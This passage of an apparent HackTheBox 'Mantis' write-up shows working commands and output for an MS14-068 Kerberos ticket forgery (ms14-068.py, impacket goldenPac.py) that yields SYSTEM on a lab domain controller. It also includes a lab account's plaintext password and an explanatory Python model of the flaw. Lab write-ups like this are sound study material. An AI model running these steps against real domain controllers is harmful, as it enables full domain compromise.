SMB 10.129.167.60 445 MANTIS ADMIN$ Remote Admin
SMB 10.129.167.60 445 MANTIS C$ Default share
SMB 10.129.167.60 445 MANTIS IPC$ Remote IPC
SMB 10.129.167.60 445 MANTIS NETLOGON READ Logon server share
SMB 10.129.167.60 445 MANTIS SYSVOL READ Logon server share
james can read NETLOGON and SYSVOL but nothing else, and nothing in those shares leads anywhere. After a lot of enumeration, two posts pointed the way: http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html and https://wizard32.net/blog/knock-and-pass-kerberos-exploitation.html. The DC is Windows Server 2008 R2 and, as the exploit run below confirms, unpatched for MS14-068: the KDC accepted a PAC whose signature used an unkeyed checksum, so any domain user could forge a ticket claiming Domain Admins membership.
To talk Kerberos from the attack box, /etc/krb5.conf needs to have information about the domain. Based on the blog, I'll set mine to:
[libdefaults]
    default_realm = HTB.LOCAL

[realms]
    # Realm names are case-sensitive and, by convention, upper-case;
    # a lower-case "htb.local" block would not match default_realm.
    HTB.LOCAL = {
        kdc = mantis.htb.local:88
        admin_server = mantis.htb.local
        default_domain = htb.local
    }

[domain_realm]
    # Map the target's DNS domain (not a leftover template domain) to the realm.
    .htb.local = HTB.LOCAL
    htb.local = HTB.LOCAL
I'll use rdate to check the remote time and make sure it's within five minutes of my host's time: Kerberos rejects requests whose timestamp differs from the KDC clock by more than the allowed skew (five minutes by default) with KRB_AP_ERR_SKEW.
Generate Kerberos Ticket
First I’ll test this config and try to generate a Kerberos ticket:
root@kali# kinit james
Password for james@HTB.LOCAL:
klist will show the ticket:
root@kali# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: james@HTB.LOCAL
Valid starting Expires Service principal
08/30/2020 16:44:33 08/31/2020 02:44:33 krbtgt/HTB.LOCAL@HTB.LOCAL
renew until 08/31/2020 16:44:26
I can try to connect to C$ with the ticket, and it will fail:
root@kali# smbclient -W htb.local //mantis/c$ -k
tree connect failed: NT_STATUS_ACCESS_DENIED
That makes sense, since this ticket is for james, who is not an administrator on the DC. If I try to connect to SYSVOL, it works:
root@kali# smbclient -W htb.local //mantis/sysvol -k
Try "help" to get a list of possible commands.
smb: \>
Forge Privileged Ticket (MS14-068)
This is not a true golden ticket (that would need the krbtgt hash); ms14-068.py abuses the KDC's PAC signature check instead. First I need the SID for the james user. I'll get it via rpcclient, authenticated as james:
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
ms14-068.py is part of the PyKEK toolkit (cloned here to /opt/pykek). It takes the user principal, that user's SID and the DC, and prompts for the password:
root@kali# python /opt/pykek/ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password:
[+] Building AS-REQ for mantis.htb.local... Done!
[+] Sending AS-REQ to mantis.htb.local... Done!
[+] Receiving AS-REP from mantis.htb.local... Done!
[+] Parsing AS-REP from mantis.htb.local... Done!
[+] Building TGS-REQ for mantis.htb.local... Done!
[+] Sending TGS-REQ to mantis.htb.local... Done!
[+] Receiving TGS-REP from mantis.htb.local... Done!
[+] Parsing TGS-REP from mantis.htb.local... Done!
[+] Creating ccache file 'TGT_james@htb.local.ccache'... Done!
This creates a file, TGT_james@htb.local.ccache. I'll copy it over root's default credential cache in /tmp, where smbclient -k picks it up (alternatively, point KRB5CCNAME at the file):
root@kali# cp TGT_james@htb.local.ccache /tmp/krb5cc_0
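Why that worked, as an added example that is neither the write-up's nor PyKEK's code: a deliberately small model of the KDC's PAC check before and after MS14-068. Real PACs are NDR-encoded and carry separate server and KDC signatures; here a PAC is a dict and a single (checksum type, value) pair stands in for both. The checksum type numbers are the RFC 3961/4757 ones, james's SID is the one rpcclient returned, the krbtgt key is a constructed stand-in, and the admin RIDs are the groups PyKEK's forged PAC claims.

```python
# Added example (not from the write-up or PyKEK): a model of the MS14-068 check.
# The pre-patch KDC honoured whichever checksum type the PAC signature named,
# so an unkeyed one (RSA-MD5) let anyone "sign" a PAC claiming admin groups.
import hashlib
import hmac
import json
from typing import Dict, List, Optional, Tuple

RSA_MD5, HMAC_MD5 = 7, -138           # rsa-md5 is unkeyed; hmac-md5 needs the krbtgt key
KEYED_TYPES = {HMAC_MD5}

JAMES_SID = "S-1-5-21-4220043660-4019079961-2895681657-1103"   # from rpcclient above
ADMIN_RIDS = [512, 518, 519, 520]     # Domain, Schema, Enterprise Admins, GPO Creator Owners

Signature = Tuple[int, bytes]


def encode(pac: Dict) -> bytes:
    """Stand-in for NDR marshalling: a canonical JSON blob."""
    return json.dumps(pac, sort_keys=True).encode()


def checksum(ctype: int, data: bytes, key: Optional[bytes] = None) -> bytes:
    if ctype == RSA_MD5:              # no key involved: anyone can compute it
        return hashlib.md5(data).digest()
    if ctype == HMAC_MD5:             # requires the secret only the KDC holds
        if key is None:
            raise ValueError("keyed checksum requires a key")
        return hmac.new(key, data, hashlib.md5).digest()
    raise ValueError(f"unsupported checksum type {ctype}")


def kdc_issue_pac(user_sid: str, rids: List[int], krbtgt_key: bytes) -> Tuple[Dict, Signature]:
    """What the KDC legitimately does: sign the PAC with a keyed checksum."""
    pac = {"user_sid": user_sid, "group_rids": sorted(rids)}
    return pac, (HMAC_MD5, checksum(HMAC_MD5, encode(pac), krbtgt_key))


def forge_pac(user_sid: str, extra_rids: List[int]) -> Tuple[Dict, Signature]:
    """What ms14-068.py does: claim admin groups and 'sign' with an unkeyed type."""
    pac = {"user_sid": user_sid, "group_rids": sorted([513] + extra_rids)}
    return pac, (RSA_MD5, checksum(RSA_MD5, encode(pac)))


def verify_pac_vulnerable(pac: Dict, sig: Signature, krbtgt_key: bytes) -> bool:
    """Pre-patch KDC (modelled): trust whatever checksum type the PAC names."""
    ctype, value = sig
    key = krbtgt_key if ctype in KEYED_TYPES else None
    return hmac.compare_digest(checksum(ctype, encode(pac), key), value)


def verify_pac_fixed(pac: Dict, sig: Signature, krbtgt_key: bytes) -> bool:
    """Post-MS14-068 KDC (modelled): unkeyed checksum types are rejected outright."""
    ctype, value = sig
    if ctype not in KEYED_TYPES:
        return False
    return hmac.compare_digest(checksum(ctype, encode(pac), krbtgt_key), value)


def demo() -> Dict[str, bool]:
    krbtgt_key = hashlib.md5(b"constructed krbtgt secret").digest()   # stand-in key
    real = kdc_issue_pac(JAMES_SID, [513], krbtgt_key)               # Domain Users only
    forged = forge_pac(JAMES_SID, ADMIN_RIDS)
    return {
        "real_vulnerable": verify_pac_vulnerable(*real, krbtgt_key),
        "real_fixed": verify_pac_fixed(*real, krbtgt_key),
        "forged_vulnerable": verify_pac_vulnerable(*forged, krbtgt_key),
        "forged_fixed": verify_pac_fixed(*forged, krbtgt_key),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:18s} {'accepted' if ok else 'rejected'}")
```

The forged PAC is accepted by the vulnerable verifier because the MD5 over the data is correct, and that is all the old check asked; the fix is to refuse the unkeyed type before looking at the value at all, which is also why the patched KDC no longer needs to know which checksum the client preferred.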
Filesystem Access
Now I have access to the entire filesystem:
root@kali# smbclient -W htb.local //mantis/c$ -k
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Fri Sep 1 10:19:03 2017
Documents and Settings DHS 0 Tue Jul 14 01:06:44 2009
inetpub D 0 Fri Sep 1 09:41:09 2017
pagefile.sys AHS 2146951168 Wed Sep 2 16:33:23 2020
PerfLogs D 0 Mon Jul 13 23:20:08 2009
Program Files DR 0 Sat Dec 23 22:28:26 2017
Program Files (x86) DR 0 Fri Sep 1 14:28:51 2017
ProgramData DH 0 Fri Sep 1 09:16:24 2017
Recovery DHS 0 Fri Sep 1 01:39:12 2017
System Volume Information DHS 0 Thu Aug 31 20:02:33 2017
Users DR 0 Fri Sep 1 10:19:01 2017
Windows D 0 Sat Dec 23 22:31:49 2017
5480959 blocks of size 4096. 288821 blocks available
I can grab both flags:
smb: \> get Users\james\desktop\user.txt
getting file \Users\james\desktop\user.txt of size 32 as Users\james\desktop\user.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> get Users\administrator\desktop\root.txt
getting file \Users\administrator\desktop\root.txt of size 32 as Users\administrator\desktop\root.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
All of that can be done in one shot with impacket's goldenPac.py, which performs the same MS14-068 forgery, uses the resulting ticket to write a service binary to ADMIN$, and starts it as a service to give a SYSTEM shell (psexec-style, so it is anything but quiet):
$ /usr/share/doc/python3-impacket/examples/goldenPac.py 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file AHYRyTll.exe
[*] Opening SVCManager on mantis.....
[*] Creating service LPnK on mantis.....
[*] Starting service LPnK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>ifconfig
b"'ifconfig' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n"
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::41a8:e26c:362f:e7d6
Link-local IPv6 Address . . . . . : fe80::41a8:e26c:362f:e7d6%11
IPv4 Address. . . . . . . . . . . : 10.129.167.60
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:c35e%11
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb